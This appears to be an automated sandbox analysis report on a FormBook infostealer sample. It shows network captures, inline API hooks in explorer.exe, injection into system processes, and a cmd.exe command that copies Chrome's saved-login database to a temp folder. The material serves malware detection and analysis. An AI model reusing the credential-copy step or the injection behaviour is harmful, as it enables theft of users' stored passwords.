sUXOcPUpDef3RCdwUOjRROZVvHc-BJDvQEOjSQhd517_syZ1ConxrLADag8yVAjSwDWHfi3PoanBXz7gI4dzkMEAF4SjJDA4DaGZex3CEtNwYE5mSPMdYTs3D9M7Tr4zAxsjv2BI4p0WtiNzCpjw8zOykO0PXnqX~uJ38-DLZHFR11lwdYWEkUkI3i2N3kFF0FYtlmjQmPluyBj9Gv2n1dKtFeDtZFFAWsXCrLKWMP1Uvq2_GuD2TRcpoopzTjbvrYGQDoRBKyVaE4kaWwR0sTYiD1F-zR
Nov 28, 2020 10:26:41.951647997 CET	8008	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.16.1 Date: Sat, 28 Nov 2020 09:26:41 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.16.1</center></body></html>
Nov 28, 2020 10:26:41.951766968 CET	8013	OUT	Data Raw: 47 72 65 5f 30 42 4a 45 67 69 56 54 42 50 6c 47 45 78 7e 63 57 51 6e 74 64 7a 6b 79 31 5a 48 57 42 79 41 53 42 66 68 48 57 41 75 73 59 6a 4d 53 63 65 69 56 41 32 4b 65 6d 34 4c 42 35 53 75 54 67 64 65 4b 42 74 49 76 32 5f 74 6a 6d 66 37 38 69 6d Data Ascii: Gre_0BJEgiVTBPlGEx~cWQntdzky1ZHWByASBfhHWAusYjMSceiVA2Kem4LB5SuTgdeKBtIv2_tjmf78imuvYa~I0zOFcEeii-6FBBC57zWvFU2rAiADfOmQLIgULb8GuzkEyj3KpxoIpSpyQiCB~y0TJ5LwUFNIgIYE9nbvZWaV8KveX7~up9NPJIb5lW8ADJJqkJtHZ2jj7mZ1g-hCL-U0WeH0aLMIBlQw1yUyizlQaCnUCo7

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 28, 2020 10:24:54.606730938 CET	162.159.129.233	443	192.168.2.6	49728	CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004	Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Sep 25 02:00:00 CEST 2014	Tue Sep 25 01:59:59 CEST 2029
					CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Nov 28, 2020 10:25:11.023576021 CET	162.159.135.233	443	192.168.2.6	49734	CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004	Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Sep 25 02:00:00 CEST 2014	Tue Sep 25 01:59:59 CEST 2029
					CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Nov 28, 2020 10:25:19.033627987 CET	162.159.130.233	443	192.168.2.6	49738	CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004	Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Sep 25 02:00:00 CEST 2014	Tue Sep 25 01:59:59 CEST 2029
					CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE4
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE4
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE4
GetMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE4

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 11-27.exe PID: 772 Parent PID: 5876

General

Start time:	10:24:52
Start date:	28/11/2020
Path:	C:\Users\user\Desktop\11-27.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\11-27.exe'
Imagebase:	0x400000
File size:	1311424 bytes
MD5 hash:	4312F55EB22B6CD52D0F6F93F40215AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 772

General

Start time:	10:25:00
Start date:	28/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Hmptdrv.exe PID: 6152 Parent PID: 3440

General

Start time:	10:25:08
Start date:	28/11/2020
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'
Imagebase:	0x400000
File size:	1311424 bytes
MD5 hash:	4312F55EB22B6CD52D0F6F93F40215AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: 00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 69%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Hmptdrv.exe PID: 6332 Parent PID: 3440

General

Start time:	10:25:16
Start date:	28/11/2020
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'
Imagebase:	0x400000
File size:	1311424 bytes
MD5 hash:	4312F55EB22B6CD52D0F6F93F40215AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: 00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: msdt.exe PID: 6492 Parent PID: 3440

General

Start time:	10:25:19
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msdt.exe
Imagebase:	0x80000
File size:	1508352 bytes
MD5 hash:	7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 6516 Parent PID: 3440

General

Start time:	10:25:21
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x950000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6640 Parent PID: 6492

General

Start time:	10:25:25
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6664 Parent PID: 6640

General

Start time:	10:25:25
Start date:	28/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6844 Parent PID: 3440

General

Start time:	10:25:31
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x90000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 11-27.exe PID: 772 Parent PID: 5876 11-27.exeCOMMON

Executed Functions

Non-executed Functions

Function 02B1A4F4, Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.339932064.0000000002B00000.00000004.00000001.sdmp, Offset: 02B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317939104f80abfdf5e30a90ff3889e37dbc05892a3eb9f56427ef7cb70f396b
Instruction ID: ae9e203ce9bdfd7675a0f28b61d75c6170fe224e1439a866338627f7d11ad65f
Opcode Fuzzy Hash: 317939104f80abfdf5e30a90ff3889e37dbc05892a3eb9f56427ef7cb70f396b
Instruction Fuzzy Hash: 30E14774A04649DFCB10DFA8C99099EB7F6EF48300BA582A5E905A7765CB34FD82CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B2896C, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.339932064.0000000002B00000.00000004.00000001.sdmp, Offset: 02B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce15b72c0ec80aa4f1425314821ecd01fa30d8155a94511a65b21c6b66bde3ca
Instruction ID: f9129e2f40705050bf678a5fb298a12c483c43a2dd152ae55f3add4d05c8b8e9
Opcode Fuzzy Hash: ce15b72c0ec80aa4f1425314821ecd01fa30d8155a94511a65b21c6b66bde3ca
Instruction Fuzzy Hash: EB21C370A04619EFCB10EF98EA8095EB7F9EB4A704F5080B5E815B3360DB30AE00CF58

Uniqueness

Uniqueness Score: -1.00%

Function 02B28C98, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.339932064.0000000002B00000.00000004.00000001.sdmp, Offset: 02B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c2d5ca23b0060dbc721b8883c47d4682d1f6133cb6a91f5ad2fc3400271a14
Instruction ID: 550e4ff53aaf9d7586a2cdecfad6811c2af786948a5f12c8b21048ed9813a8f9
Opcode Fuzzy Hash: 49c2d5ca23b0060dbc721b8883c47d4682d1f6133cb6a91f5ad2fc3400271a14
Instruction Fuzzy Hash: BFC09247F1A80107FF288820CA6277E8063C7D32A1F19F5BA8005F34C9D52CCAC1000E

Uniqueness

Uniqueness Score: -1.00%

Function 02B163A4, Relevance: 5.2, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

0ND, xrefs: 02B1649E
,, xrefs: 02B16454
?, xrefs: 02B1645B
0ND, xrefs: 02B1655D

Memory Dump Source

Source File: 00000000.00000003.339932064.0000000002B00000.00000004.00000001.sdmp, Offset: 02B00000, based on PE: false

Similarity

API ID:
String ID: ,$0ND$0ND$?
API String ID: 0-1964996382
Opcode ID: 5e7ec865a988939fdc8c258cc47677784f2879ccbc4a969fa65e8338f09fc76f
Instruction ID: 11652346894a79f0928aedc6a90b3680d2927b0d5529d7881e173685f94e882a
Opcode Fuzzy Hash: 5e7ec865a988939fdc8c258cc47677784f2879ccbc4a969fa65e8338f09fc76f
Instruction Fuzzy Hash: B061B430A042449FEB10EF79DC8169EBBFABF09301B8884B5D941E735AEB34E945CB54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Hmptdrv.exe PID: 6152 Parent PID: 3440 Hmptdrv.exeCOMMON

Executed Functions

Non-executed Functions

Function 022459CC, Relevance: 15.1, Strings: 12, Instructions: 141COMMON

Download Yara Rule

Strings

@, xrefs: 02245AA9
l@, xrefs: 02245B85
\@, xrefs: 02245B6F
d@, xrefs: 02245B6A
<@, xrefs: 02245B43
@, xrefs: 02245B28
|@, xrefs: 02245B9B
T@, xrefs: 02245B96
@, xrefs: 02245B80
@, xrefs: 02245A93
,@, xrefs: 02245B2D
L@, xrefs: 02245B59

Memory Dump Source

Source File: 00000002.00000003.375257780.0000000002238000.00000004.00000001.sdmp, Offset: 02238000, based on PE: false

Associated: 00000002.00000003.372792238.0000000002238000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: @$,@$<@$L@$T@$\@$d@$l@$|@$@$@$@
API String ID: 0-997764628
Opcode ID: 5898b3e541d23e735b3939f3a2c74fac8ae37101b50f3b4c0548b044d655b79e
Instruction ID: 08eca9cabb5697bb1f066d544a91769352bf57814aa8631ef56a697f07ece743
Opcode Fuzzy Hash: 5898b3e541d23e735b3939f3a2c74fac8ae37101b50f3b4c0548b044d655b79e
Instruction Fuzzy Hash: 3C414FB05253055BD3186BEA7800427B7D9E3507253E0D83BF048AA7C8EF78A8618E6E

Uniqueness

Uniqueness Score: -1.00%

Function 02245310, Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

E, xrefs: 02245356
,E, xrefs: 02245380
XE, xrefs: 02245341
8E, xrefs: 0224536B

Memory Dump Source

Source File: 00000002.00000003.375257780.0000000002238000.00000004.00000001.sdmp, Offset: 02238000, based on PE: false

Associated: 00000002.00000003.372792238.0000000002238000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: E$,E$8E$XE
API String ID: 0-3100681216
Opcode ID: 4847cf71b0e4e1d8b74baacff1e7673f89bbc534e493cb30b178788910f26731
Instruction ID: 54ec61a45815c7819e153a5f139a21a386445e793e3b2ff973b4be51660a3205
Opcode Fuzzy Hash: 4847cf71b0e4e1d8b74baacff1e7673f89bbc534e493cb30b178788910f26731
Instruction Fuzzy Hash: D92115B432068047D706BBE8D950A2B3213DBC1315B508536EA45AF76EDE3CAC118F9E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Hmptdrv.exe PID: 6332 Parent PID: 3440 Hmptdrv.exeCOMMON

Executed Functions

Non-executed Functions

Function 02AE63A4, Relevance: 5.2, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

?, xrefs: 02AE645B
0ND, xrefs: 02AE649E
0ND, xrefs: 02AE655D
,, xrefs: 02AE6454

Memory Dump Source

Source File: 00000005.00000003.391301833.0000000002AD0000.00000004.00000001.sdmp, Offset: 02AD0000, based on PE: false

Similarity

API ID:
String ID: ,$0ND$0ND$?
API String ID: 0-1964996382
Opcode ID: 5e7ec865a988939fdc8c258cc47677784f2879ccbc4a969fa65e8338f09fc76f
Instruction ID: b656d382ff81e73d257b2df7f31f146ec987c0a9028abe2825977793339031b0
Opcode Fuzzy Hash: 5e7ec865a988939fdc8c258cc47677784f2879ccbc4a969fa65e8338f09fc76f
Instruction Fuzzy Hash: 2761D230A042459FDF10EF79DD9069EBBFABF09700B0488B5D942E725AEB34E946CB54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msdt.exe PID: 6492 Parent PID: 3440 msdt.exeCOMMON

Executed Functions

Function 02AA9F2A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02AA4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02AA4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02AA9F7D

Strings

.z`, xrefs: 02AA9F6D, 02AA9F78

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 3627c27f62a3b8010574830eb18b126a815259faaff9ced5509d0a3a8663a23e
Instruction ID: 4784e6643934a37421ae194a38b6f6100a2589f6f91fb27dbc8096c4732228b8
Opcode Fuzzy Hash: 3627c27f62a3b8010574830eb18b126a815259faaff9ced5509d0a3a8663a23e
Instruction Fuzzy Hash: 46119FB6214109AFCB48DF99DC90DEB77EEAF8C754F158248FA5D93241D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02AA9F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02AA4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02AA4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02AA9F7D

Strings

.z`, xrefs: 02AA9F6D, 02AA9F78

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: e2df17a7043d5af073ba28b73d63b847e20aabd241bfef8cd28a7c8341453817
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 5DF0B2B2211208ABCB48CF88DC94EEB77EDAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

